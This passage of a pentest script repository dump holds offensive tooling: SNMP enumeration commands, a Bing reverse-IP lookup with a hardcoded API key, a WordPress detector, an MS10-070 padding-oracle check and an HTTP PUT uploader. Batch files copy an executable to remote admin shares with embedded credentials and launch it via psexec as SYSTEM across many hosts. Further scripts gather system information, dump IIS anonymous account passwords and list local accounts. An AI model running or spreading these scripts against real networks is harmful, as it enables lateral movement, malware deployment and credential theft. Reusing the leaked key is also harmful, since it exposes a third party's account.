-v1 $ip 1| 7 | § grep hrSWRunName|cut -d\* \* -f 8 | § snmpenum -t $ip 9 | onesixtyone -c names -i hosts 10 | 11 | 12 | echo public > community 13 | echo private >> community 14 | echo manager >> community 15 | for ip in $(seq 1 254); do echo 10.11.1.$ip; done > ips 16 | onesixtyone -c community -i ips 17 | 18 | # Enumerate windows users 19 | snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25 20 | # Enumerate windows processes 21 | snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.25.4.2.1.2 22 | # Enumerate Open TCP ports 23 | snmpwalk -c public -v1 10.11.1.204 1.3.6.1.2.1.6.13.1.3 24 | # Enumerate installed software 25 | snmpwalk -c public -v1 10.11.1.204 1.3.6.1.2.1.25.6.3.1.2 26 | -------------------------------------------------------------------------------- /Web/Domain/bing_api.py: -------------------------------------------------------------------------------- 1 | import urllib2, socket,sys,base64 2 | from xml.dom.minidom import parse, parseString 3 | 4 | 5 | def showhelp(): 6 | print """------------""" 7 | 8 | 9 | def bing(account_key,ip): 10 | sites = [] 11 | skip = 0 12 | top = 50 13 | 14 | while skip < 200: 15 | url = "https://api.datamarket.azure.com/Data.ashx/Bing/Search/v1/Web?Query='ip:%s'&$top=%s&$skip=%s&$format=Atom"%(ip,top,skip) 16 | request = urllib2.Request(url) 17 | auth = base64.encodestring("%s:%s" % (account_key, account_key)).replace("\n", "") 18 | request.add_header("Authorization", "Basic %s" % auth) 19 | res = urllib2.urlopen(request) 20 | data = res.read() 21 | 22 | xmldoc = parseString(data) 23 | site_list = xmldoc.getElementsByTagName('d:Url') 24 | for site in site_list: 25 | domain = site.childNodes[0].nodeValue 26 | domain = domain.split("/")[2] 27 | if domain not in sites: 28 | sites.append(domain) 29 | 30 | skip += 50 31 | #print "######################################" 32 | print "%s : %s" %(ip,len(sites)) 33 | for site in sites: 34 | print ' '+site 35 | return sites 36 | #print "######################################" 37 | 38 | 39 | def options(arguments): 40 | try: 41 | count = 0 42 | ip = "" 43 | account_key = "gQxNd7GPn2yASnBDHWJqRZWe5cKrlqo257yf/LdKOII" 44 | for arg in arguments: 45 | if arg == "-ip": 46 | ip = arguments[count+1] 47 | elif arg == "-domain": 48 | ip = socket.gethostbyname(arguments[count+1]) 49 | elif arg == "-key": 50 | account_key = arguments[count+1] 51 | count = count+1 52 | bing(account_key,ip) 53 | except: 54 | print "something went wrong" 55 | 56 | if __name__ == "__main__": 57 | if len(sys.argv) <= 3 or "-key" not in sys.argv: 58 | showhelp() 59 | bing("gQxNd7GPn2yASnBDHWJqRZWe5cKrlqo257yf/",'x.x.x.x') 60 | sys.exit() 61 | else: 62 | options(sys.argv) 63 | -------------------------------------------------------------------------------- /Web/Recon/simple_wp_check.py: -------------------------------------------------------------------------------- 1 | from urllib import request 2 | import re 3 | import http.client 4 | 5 | urllist=[] 6 | def Readurl(filename,listurl): 7 | f = open(filename) 8 | for line in f: 9 | line = line.split('\n') 10 | #print(line[0]) 11 | listurl.append(line[0]) 12 | 13 | #Judges(line[0]) 14 | f.close() 15 | print(listurl) 16 | 17 | def Judges(url,test): 18 | 19 | if 'http:' in url: 20 | pass 21 | else: 22 | url='http://'+url 23 | print(url) 24 | try: 25 | r = request.urlopen(url) 26 | bytecode = r.read() 27 | htmlstr = bytecode.decode() 28 | if test in htmlstr: 29 | return 1 30 | else: 31 | return 0 32 | except: 33 | return 0 34 | 35 | def getResponseCode(url,xx): 36 | if 'http:' in url: 37 | url= url[7:] 38 | print(url) 39 | 40 | conn = http.client.HTTPConnection(url,80,timeout=10) 41 | 42 | try: 43 | conn.request("GET", xx) 44 | r1 = conn.getresponse() 45 | if r1.status==200: 46 | return 1 47 | else: 48 | return 0 49 | except: 50 | return 0 51 | 52 | 53 | 54 | 55 | 56 | #Judges('http://baidu.com','test') 57 | Readurl('url.txt',urllist) 58 | 59 | 60 | for i in urllist: 61 | if(Judges(i,'WordPress') or Judges(i+'/robots.txt','wp') or getResponseCode(i,'\wp-login.php') or getResponseCode(i,'\wp-login.php')): 62 | print('wordpress'+i) 63 | else: 64 | print(i) 65 | -------------------------------------------------------------------------------- /WebExp/DotNetPaddingAttack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # PoC for checking if MS10-070 patch is applied by providing a .NET 4 | # application ScriptResource or WebResource resource handler's 'd' block 5 | # 6 | # Credits go to: 7 | # 8 | # * Juliano Rizzo - for the amazing research and hints about the remote 9 | # passive check 10 | # 11 | # 12 | # * Brian Holyfield - for his tool to exploit Padding Oracle attacks in a 13 | # generic and easy way 14 | # 15 | # 16 | # * Giorgio Fedon - for initial Perl version of this check 17 | # 18 | # 19 | # * Alejo Murillo Moya - for testing and ideas 20 | # 21 | # 22 | # Copyright (c) 2010 Bernardo Damele A. G. 23 | # 24 | # 25 | # Example of unpatched system: 26 | # 27 | # * /WebResource.axd?d=kHoDoPikaYfoTe1m9Ol5iQ2 28 | # * /ScriptResource.axd?d=2nYOzoKtRvjs-g53K3r7VKmEXeQl_XMNY8nDEwcgwGVcS5Z8b9GanbNdzIgg493kfB_oInMb2DtFFEy5e-ajqdwMbg1F96l10 29 | # 30 | # Examples of patched system: 31 | # 32 | # * /WebResource.axd?d=VHYaLecZ91Zjq-_4mV3ftpYrTteh9kHzk9zwLyjpAZAOjWL3nbx1SmIeGdHJwBu_koMj8ZGAqrtxCJkW0 33 | # * /ScriptResource.axd?d=Gcb5Zt1XkIPHAYC3l5vZ4QidrZMKISjkqnMQRQDqRD88oxkWIL1kNBQThGrDJBbaKqPd9AyT-jF1EhM-rame5NXv7RLQRhtlz-xfoQlHXf_pjgiBJW7ntGxhegohUeNFlo9x8_RMU6ocDmwwK6dfIRDFbX01 34 | 35 | import sys 36 | 37 | def base64decode(string): 38 | return string.decode("base64") 39 | 40 | def hexdecode(string): 41 | string = string.lower() 42 | 43 | if string.startswith("0x"): 44 | string = string[2:] 45 | 46 | return string.decode("hex") 47 | 48 | def hexencode(string): 49 | return string.encode("hex") 50 | 51 | def dotNetUrlTokenDecode(string): 52 | """ 53 | Ported from padbuster v0.3 by Brian Holyfield: 54 | 55 | sub web64Decode { 56 | my ($input, $net) = @_; 57 | # net: 0=No Padding Number, 1=Padding (NetUrlToken) 58 | $input =~ s/\-/\+/g; 59 | $input =~ s/\_/\//g; 60 | if ($net == 1) 61 | { 62 | my $count = chop($input); 63 | $input = $input.("=" x int($count)); 64 | } 65 | return decode_base64($input); 66 | } 67 | """ 68 | 69 | string = string.replace("-", "+").replace("_", "/") 70 | count = string[-1] 71 | 72 | if count.isdigit(): 73 | string = string[:-1] + ("=" * int(count)) 74 | 75 | return base64decode(string) 76 | 77 | def usage(): 78 | print """ 79 | Use: 80 | 81 | ./ms10-070_check.py 82 | 83 | Note: 84 | 85 | Encrypted 'd' block MUST be from ScriptResource.axd or WebResource.axd. 86 | Parse the application response body to find a valid one. 87 | 88 | Examples: 89 | 90 | With ScriptResource.axd 'd' block: 91 | $ ./ms10-070_check.py 2nYOzoKtRvjs-g53K3r7VKmEXeQl_XMNY8nDEwcgwGVcS5Z8b9GanbNdzIgg493kfB_oInMb2DtFFEy5e-ajqdwMbg1F96l10 92 | Your application is VULNERABLE, patch against MS10-070 93 | 94 | With WebResource.axd 'd' block: 95 | ./ms10-070_check.py VHYaLecZ91Zjq-_4mV3ftpYrTteh9kHzk9zwLyjpAZAOjWL3nbx1SmIeGdHJwBu_koMj8ZGAqrtxCJkW0 96 | Your application is NOT vulnerable 97 | """ 98 | 99 | def main(): 100 | if len(sys.argv) < 2: 101 | usage() 102 | sys.exit(1) 103 | 104 | if (len(dotNetUrlTokenDecode(sys.argv[1])) % 8) == 0: 105 | print "Your application is VULNERABLE, patch against MS10-070" 106 | else: 107 | print "Your application is NOT vulnerable" 108 | 109 | if __name__ == '__main__': 110 | main() 111 | -------------------------------------------------------------------------------- /bat/cmd压缩解压/atzip.bat: -------------------------------------------------------------------------------- 1 | zip.exe -r temp.zip wwwroot -------------------------------------------------------------------------------- /bat/cmd压缩解压/readme.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/cmd压缩解压/readme.bat -------------------------------------------------------------------------------- /bat/cmd压缩解压/unzip.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/cmd压缩解压/unzip.exe -------------------------------------------------------------------------------- /bat/cmd压缩解压/wwwroot/atzip.bat: -------------------------------------------------------------------------------- 1 | zip.exe -r temp.zip wwwroot -------------------------------------------------------------------------------- /bat/cmd压缩解压/wwwroot/zip.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/cmd压缩解压/wwwroot/zip.exe -------------------------------------------------------------------------------- /bat/cmd压缩解压/zip.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/cmd压缩解压/zip.exe -------------------------------------------------------------------------------- /bat/dsquery ou 所有pc/allou.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/dsquery ou 所有pc/allou.txt -------------------------------------------------------------------------------- /bat/dsquery ou 所有pc/test.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | for /f %%i in (allou.txt) do ( 3 | echo %%i 4 | 5 | 6 | 7 | ) -------------------------------------------------------------------------------- /bat/exe可否执行/a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/exe可否执行/a.exe -------------------------------------------------------------------------------- /bat/exe可否执行/test.txt: -------------------------------------------------------------------------------- 1 | serivce test file! 2 | -------------------------------------------------------------------------------- /bat/net_use.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | net use \\TS0002\c$ l /user:loc\fa 3 | copy template.exe \\TS0002\c$\windows\temp\template.exe 4 | psexec.exe /accepteula 5 | Psexec.exe -s \\TS0002 c:\WINDOWS\system32\cmd.exe /c start c:\WINDOWS\temp\template.exe 6 | net use \\TS0002\c$ /del 7 | 8 | @echo off 9 | for /f %%i in (netview.txt) do ( 10 | net use %%i\c$ "password" /user:user\locaback 11 | copy template.exe %%i\c$\windows\temp\temp.exe 12 | psexec /accepteula 13 | Psexec -s %%i c:\WINDOWS\system32\cmd.exe /c start c:\WINDOWS\temp\temp.exe 14 | net use %%i\c$ 15 | ) 16 | -------------------------------------------------------------------------------- /bat/ping/netview1.txt: -------------------------------------------------------------------------------- 1 | ff 2 | ff 3 | -------------------------------------------------------------------------------- /bat/ping/test1.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | for /f %%i in (netview1.txt) do ( 3 | echo %%i 4 | echo %%i >> ping.txt 5 | ping %%i^ -n -1 >> ping1.txt 6 | 7 | 8 | ) -------------------------------------------------------------------------------- /bat/pingbat.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | for /f %%i in (netview.txt) do ( 3 | net use \\%%i "G" /user:NT\SQL3 4 | copy template.exe \\%%i\c$\windows\temp\template.exe 5 | psexec.exe /accepteula 6 | Psexec.exe -s \\%%i c:\WINDOWS\system32\cmd.exe /c start c:\WINDOWS\temp\template.exe 7 | net use \\%%i /del 8 | 9 | ) -------------------------------------------------------------------------------- /bat/收集系统信息.bat: -------------------------------------------------------------------------------- 1 | whoami >c:\windows\temp\cat.txt 2 | systeminfo >>c:\windows\temp\cat.txt 3 | ipconfig /all >>c:\windows\temp\cat.txt 4 | arp -a>>c:\windows\temp\cat.txt 5 | netstat -an>>c:\windows\temp\cat.txt -------------------------------------------------------------------------------- /bat/遍历所有子目录子文件/xlc.bat: -------------------------------------------------------------------------------- 1 | ::ref:http://stackoverflow.com/questions/8487489/batch-programming-get-relative-path-of-file 2 | 3 | @echo off & setlocal enabledelayedexpansion 4 | 5 | set rootdir=%~dp0 6 | set foo=%rootdir% 7 | set cut= 8 | :loop 9 | if not "!foo!"=="" ( 10 | set /a cut += 1 11 | set foo=!foo:~1! 12 | goto :loop 13 | ) 14 | echo Root dir: %rootdir% 15 | echo strlen : %cut% 16 | echo ------------------------ 17 | :: also remove leading / 18 | set /a cut += 1 19 | 20 | for /R %rootdir% %%F in (.,*) do ( 21 | set B=%%~fF 22 | ::take substring of the path 23 | set B=!B:~%cut%! 24 | ::echo Full : %%F 25 | echo \!B! 26 | 27 | echo \!B!>>%~n0.txt 28 | ) 29 | echo ------------------------ 30 | echo result saved in %~n0.txt . 31 | 32 | 33 | 34 | pause -------------------------------------------------------------------------------- /bat/遍历所有子目录子文件/xlc.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/遍历所有子目录子文件/xlc.txt -------------------------------------------------------------------------------- /quickput.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | """ 3 | QuickPut 1.5 - http://infomesh.net/2001/QuickPut/ 4 | 5 | This is a program that enables one to load files onto a server using 6 | the HTTP PUT method. It supports basic and digest authentication. 7 | 8 | Usage: QuickPut [ --help ] [ --v ] file http_uri [ uname pswd ] 9 | 10 | --help - Prints this message out 11 | --v - Turns on "verbose" mode 12 | 13 | "file" is the local file to upload, and "http_uri" is the target. 14 | "uname" and "pswd" are optional authentication details. 15 | """ 16 | 17 | __author__ = 'Sean B. Palmer' 18 | __license__ = 'Copyright (C) 2001 Sean B. Palmer. GNU GPL 2' 19 | __version__ = '1.5' 20 | __cvsid__ = '$Id$' 21 | 22 | import sys, string, re, os, base64, md5, sha, time 23 | import httplib, urlparse, urllib, urllib2 24 | 25 | UAID = 'QuickPut/'+__version__+' (http://infomesh.net/2001/QuickPut/)' 26 | if ('-v' in sys.argv) or ('--v' in sys.argv): VERBOSE = 1 27 | else: VERBOSE = 0 28 | 29 | def perr(s): 30 | """The standard error printing function. 31 | Can go to STDERR, STDOUT, or both.""" 32 | if VERBOSE: 33 | sys.stderr.write(s.strip()+'\n\n') 34 | print s.strip()+'\n' 35 | 36 | def precondition(uri, auth=None): 37 | """HEAD a resource, and return the code 38 | Could be extended to get the ETag, etc.""" 39 | perr('Sending HEAD request to: '+uri) 40 | u = urlparse.urlparse(uri) 41 | n, p = u[1], u[2] 42 | if '@' in n: sys.exit(0) 43 | h = httplib.HTTP(n) 44 | h.putrequest('HEAD', p) 45 | if auth: 46 | perr('Auth: '+str(auth)) 47 | if 'type' in auth.keys(): 48 | if auth['type'] == 'Basic': authtobasic(auth, h) 49 | elif auth['type'] == 'Digest': authtodigest(auth, h, uri, 'HEAD') 50 | h.putheader('Accept', '*/*') 51 | h.putheader('Accept-Encoding', '*,deflate') 52 | h.putheader('TE', 'trailers,deflate') 53 | h.putheader('User-Agent', UAID) 54 | h.putheader('Connection', 'TE,Keep-Alive') 55 | h.endheaders() 56 | errcode, errmsg, headers = h.getreply() 57 | h.close() 58 | perr('HEAD response code: '+str(errcode)+'\nResponse headers: '+str(headers)) 59 | if auth: 60 | if ('type' in auth.keys()) and (errcode == 401): 61 | perr('Authorization failed!\n'+'Auth: '+headers['www-authenticate']) 62 | sys.exit(0) # Stops it from contunually looping 63 | return errcode, errmsg, headers 64 | 65 | def put(fn, uri, auth=None): 66 | errcode, errmsg, headers = precondition(uri, auth=auth) 67 | if errcode in (301, 302): 68 | if not auth: put(fn, headers['Location']) 69 | else: put(fn, headers['Location'], auth=auth) 70 | elif errcode == 401: 71 | wwwauth = headers['www-authenticate'] 72 | match = re.match('[ \t]*([^ \t]+)[ \t]+realm="([^"]*)"', wwwauth) 73 | scheme, realm = match.groups() 74 | if scheme.lower() == 'basic': 75 | perr('HTTP Basic authentication spotted') 76 | if not auth: 77 | perr('No authentication details given!') 78 | sys.exit(0) # Stops it from contunually looping 79 | auth['type'] = 'Basic' 80 | put(fn, uri, auth=auth) 81 | elif scheme.lower() == 'digest': 82 | # 2001-07-19 14:08:03 pls support digest auth as well as 83 | # basic. Don't encourage users to send their passwords in the clear. 84 | perr('HTTP Digest authentication spotted') 85 | if not auth: 86 | perr('No authentication details given!') 87 | sys.exit(0) 88 | auth['type'], auth['data'] = 'Digest', wwwauth 89 | put(fn, uri, auth=auth) 90 | elif errcode in (200, 204, 206, 404): putdata(fn, uri, auth=auth) 91 | else: perr('Got error code: '+str(errcode)) # e.g. 403, 501 92 | 93 | # Basic Authentication 94 | 95 | def authtobasic(auth, h): 96 | """Converts basic auth data into an HTTP header.""" 97 | userpass = auth['uname']+':'+auth['pswd'] 98 | userpass = base64.encodestring(urllib.unquote(userpass)).strip() 99 | h.putheader('Authorization', 'Basic '+userpass) 100 | perr('Authorization: Basic '+userpass) 101 | 102 | # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 103 | # 104 | # D I G E S T A U T H E N T I C A T I O N S T U F F 105 | # These functions are based on the stuff in urllib2 106 | # 107 | 108 | def authtodigest(auth, h, uri, method): 109 | user, pw, a = auth['uname'], auth['pswd'], auth['data'] 110 | x = http_digest_auth(a, uri, user, pw, method) 111 | h.putheader('Authorization', x) 112 | perr('Authorization: '+x) 113 | 114 | def http_digest_auth(a, uri, user, pw, method): 115 | token, challenge = a.split(' ', 1) 116 | chal = urllib2.parse_keqv_list(urllib2.parse_http_list(challenge)) 117 | a = get_authorization(chal, uri, user, pw, method) 118 | if a: return 'Digest %s' % a 119 | 120 | def get_authorization(chal, uri, user, pw, method): 121 | try: 122 | realm, nonce = chal['realm'], chal['nonce'] 123 | algorithm, opaque = chal.get('algorithm', 'MD5'), chal.get('opaque', None) 124 | except KeyError: return None 125 | H, KD = get_algorithm_impls(algorithm) 126 | if H is None: return None 127 | A1, A2 = "%s:%s:%s" % (user, realm, pw), "%s:%s" % (method, uri) 128 | respdig = KD(H(A1), "%s:%s" % (nonce, H(A2))) 129 | base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \ 130 | 'response="%s"' % (user, realm, nonce, uri, respdig) 131 | if opaque: base = base + ', opaque="%s"' % opaque 132 | if algorithm != 'MD5': base = base + ', algorithm="%s"' % algorithm 133 | return base 134 | 135 | def get_algorithm_impls(algorithm): 136 | if algorithm == 'MD5': 137 | H = lambda x, e=urllib2.encode_digest:e(md5.new(x).digest()) 138 | elif algorithm == 'SHA': 139 | H = lambda x, e=urllib2.encode_digest:e(sha.new(x).digest()) 140 | KD = lambda s, d, H=H: H("%s:%s" % (s, d)) 141 | return H, KD 142 | 143 | # 144 | # End of Digest Authentication functions 145 | # 146 | # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 147 | 148 | def putdata(fn, uri, auth=None): 149 | f, u = open(fn, 'r'), urlparse.urlparse(uri) 150 | b = f.read() 151 | s = str(len(b)) 152 | n, p = u[1], u[2] 153 | perr('PUTing to: '+uri+'\nData: Content-Length: '+s+', Snippet: "'+b[:35]+'"') 154 | h = httplib.HTTP(n) 155 | h.putrequest('PUT', p) 156 | h.putheader('Accept', '*/*') 157 | h.putheader('Allow', 'PUT') 158 | if auth: 159 | if 'type' in auth.keys(): 160 | if auth['type'] == 'Basic': authtobasic(auth, h) 161 | elif auth['type'] == 'Digest': authtodigest(auth, h, uri, 'PUT') 162 | h.putheader('Accept-Encoding', '*,deflate') 163 | h.putheader('Expect', '100-continue') 164 | h.putheader('User-Agent', UAID) 165 | h.putheader('Connection', 'Keep-Alive') 166 | h.putheader('Content-Type', 'text/html') 167 | h.putheader('Content-Length', s) 168 | h.endheaders() 169 | h.send(b) 170 | perr('Getting reply...') 171 | errcode, errmsg, headers = h.getreply() 172 | # body = h.getfile().read(500) 173 | perr('Got reply') 174 | h.close() 175 | if errcode in (301, 302): 176 | perr('PUT data error code was '+str(errcode)) 177 | if not auth: put(fn, headers['Location']) 178 | else: put(fn, headers['Location'], auth=auth) 179 | elif errcode == 401: 180 | perr('Authorization failed!\n'+'Auth: '+headers['www-authenticate']) 181 | sys.exit(0) # Stops it from continually looping 182 | else: 183 | perr('Done: '+str(errcode)+': '+str(errmsg)+'\n'+str(headers)) 184 | if errcode in (200, 201, 204): 185 | sys.stderr.write('PUT succeeded!') 186 | # perr(body) 187 | elif errcode == 405: sys.stderr.write('PUT failed!') 188 | elif errcode == 404: perr('PUT failed: 404!') 189 | 190 | # Utility functions 191 | 192 | def prompt(): 193 | """Prompts for the file name and URI to PUT to.""" 194 | sys.stderr.write('Enter the name of the file you want to HTTP PUT: \n') 195 | fn = raw_input() 196 | sys.stderr.write('Enter the URI to HTTP PUT to: \n') 197 | uri = raw_input() 198 | if uri[-1] == '/': 199 | sys.stderr.write('URI ends with a "/"; please enter a file name: \n') 200 | urifn = raw_input() 201 | uri = uri+urifn 202 | sys.stderr.write('Thank you. Saving to: '+uri+'\n') 203 | put(fn, uri) 204 | 205 | def help(): 206 | print string.strip(__doc__) 207 | sys.exit(0) 208 | 209 | def run(): 210 | HelpFlags, argv = ('-help', '--help'), sys.argv[:] 211 | for x in sys.argv: 212 | if x in HelpFlags: help() 213 | if x[0] == '-': argv.remove(x) 214 | s = len(argv)-1 215 | # perr(str(argv)+' '+str(VERBOSE)) 216 | if s == 2: put(argv[1], argv[2]) 217 | elif s == 4: put(argv[1], argv[2], auth={'uname': argv[3], 'pswd': argv[4]}) 218 | else: help() 219 | 220 | if __name__=="__main__": 221 | run() 222 | -------------------------------------------------------------------------------- /vbs/finddomaincontrol.vbs: -------------------------------------------------------------------------------- 1 | set obj=GetObject("LDAP://rootDSE") 2 | wscript.echo obj.servername -------------------------------------------------------------------------------- /vbs/iis.vbs: -------------------------------------------------------------------------------- 1 | Set ObjService=GetObject("IIS://LocalHost/W3SVC") 2 | 3 | For Each obj3w In objservice 4 | 5 | childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"") 6 | 7 | if IsNumeric(childObjectName)=true then 8 | 9 | set IIs=objservice.GetObject("IIsWebServer",childObjectName) 10 | 11 | if err.number<>0 then 12 | 13 | exit for 14 | 15 | msgbox("error!") 16 | 17 | wscript.quit 18 | 19 | end if 20 | 21 | serverbindings=IIS.serverBindings 22 | 23 | ServerComment=iis.servercomment 24 | 25 | set IISweb=iis.getobject("IIsWebVirtualDir","Root") 26 | 27 | user=iisweb.AnonymousUserName 28 | 29 | pass=iisweb.AnonymousUserPass 30 | 31 | path=IIsWeb.path 32 | 33 | list=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf 34 | 35 | end if 36 | 37 | Next 38 | 39 | wscript.echo list 40 | 41 | Set ObjService=Nothing 42 | 43 | wscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf 44 | 45 | WScript.Quit 46 | 47 | -------------------------------------------------------------------------------- /vbs/ping.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/vbs/ping.vbs -------------------------------------------------------------------------------- /vbs/windows获得所有本地账户信息/ff.vbs: -------------------------------------------------------------------------------- 1 | On Error Resume Next 2 | Const ForReading = 1, ForWriting = 2 3 | Dim fso, f 4 | Set fso = CreateObject("Scripting.FileSystemObject") 5 | Set f = fso.OpenTextFile("testfile.txt", ForWriting, True) 6 | 7 | strComputer = "." 8 | Set objWMIService = GetObject("winmgmts:" _ 9 | & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") 10 | 11 | Set colItems = objWMIService.ExecQuery _ 12 | ("Select * from Win32_UserAccount Where LocalAccount = True") 13 | 14 | For Each objItem in colItems 15 | f.WriteLine("Account Type: " & objItem.AccountType) 16 | f.WriteLine("Caption: " & objItem.Caption ) 17 | f.WriteLine("Description: " & objItem.Description ) 18 | f.WriteLine("Disabled: " & objItem.Disabled ) 19 | f.WriteLine("Domain: " & objItem.Domain ) 20 | f.WriteLine("Full Name: " & objItem.FullName ) 21 | f.WriteLine("InstallDate: " & objItem.InstallDate ) 22 | f.WriteLine("Local Account: " & objItem.LocalAccount ) 23 | f.WriteLine("Lockout: " & objItem.Lockout ) 24 | f.WriteLine("Name: " & objItem.Name ) 25 | f.WriteLine("Password Changeable: " & objItem.PasswordChangeable ) 26 | f.WriteLine("Password Expires: " & objItem.PasswordExpires ) 27 | f.WriteLine("Password Required: " & objItem.PasswordRequired ) 28 | f.WriteLine("SID: " & objItem.SID ) 29 | f.WriteLine("SID Type: " & objItem.SIDType ) 30 | f.WriteLine("Status: " & objItem.Status ) 31 | f.WriteLine(" ") 32 | 33 | Next 34 | 35 | f.Close -------------------------------------------------------------------------------- /vbs/收集系统信息.bat: -------------------------------------------------------------------------------- 1 | whoami >c:\windows\temp\cat.txt 2 | systeminfo >>c:\windows\temp\cat.txt 3 | ipconfig /all >>c:\windows\temp\cat.txt 4 | arp -a>>c:\windows\temp\cat.txt 5 | netstat -an>>c:\windows\temp\cat.txt --------------------------------------------------------------------------------